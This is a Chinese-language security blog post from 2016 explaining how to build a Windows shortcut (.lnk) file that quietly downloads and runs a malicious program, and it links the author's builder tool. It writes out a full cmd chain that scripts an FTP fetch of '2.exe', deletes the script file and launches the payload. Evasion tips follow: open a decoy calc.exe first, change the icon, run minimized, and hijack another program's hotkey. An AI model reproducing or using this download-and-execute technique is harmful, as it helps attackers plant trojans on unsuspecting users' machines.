未加星标

Windows小工具:LnkDown快捷方式加载Payload

字体大小 | |
[系统(windows) 所属分类 系统(windows) | 发布者 店小二04 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏
前言

投稿一次,被小编退了,原因是不够扯。我就是小学没毕业的小学生,你让我扯,我去哪跟你扯的天花乱坠啊,使出洪荒之力我就再扯一次吧。还是要感谢下CodeSec上次的小礼物,灰常喜欢。

之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的,也就是说在默认未装载的PC上就然并卵了。


Windows小工具:LnkDown快捷方式加载Payload

快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢?聪明的你想到cmd多命令执行了吗?whoami&&netuser??至于下载文件,既然可以cmd多命令执行了,当然可以利用ftp下载文件了,有了思路就动手吧!

基本思路 逻辑

1. Echo写出ftp信息,使用ftp s:x 参数运行下载命令

2. 语句使用&&链接,语句被执行才会继续下一步操作

3. 最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行


Windows小工具:LnkDown快捷方式加载Payload
思路验证 echo open127.0.0.1>f&&echo 123>>f&&echo321>>f&&echo get 2.exe>>f&&echobye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe

CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。


Windows小工具:LnkDown快捷方式加载Payload
奇技淫巧

如果你右键查看,细心的朋友已经注意到有一个快捷键的选项,快捷方式的快捷方式,他是个无公害的功能,如果被恶意替换冲突某些程序的快捷方式呢?例如QQ的Ctrl+Alt+A截屏快捷键,毕竟是失传已久的“隔空怀孕”,难免有射不准的时候,多测试几次找找规律!


Windows小工具:LnkDown快捷方式加载Payload
自动工具

每次创建都尼玛要写一长串cmd命令,就算不烦也难免写出的时候啊,结合上面的实验写了一个小工具,纯属方便用的,附上小工具:LnkDown.exe

链接: https://pan.baidu.com/s/1mie0mko 密码: 5dxi

防御:远离黑客,珍爱生命!

*原创作者:键盘手,转载请注明来自CodeSec(CodeSec.Net)

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

主题: WindowsPowerShellUF黑客冲突
分页:12
转载请注明
本文标题:Windows小工具:LnkDown快捷方式加载Payload
本站链接:http://www.codesec.net/view/479802.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(83)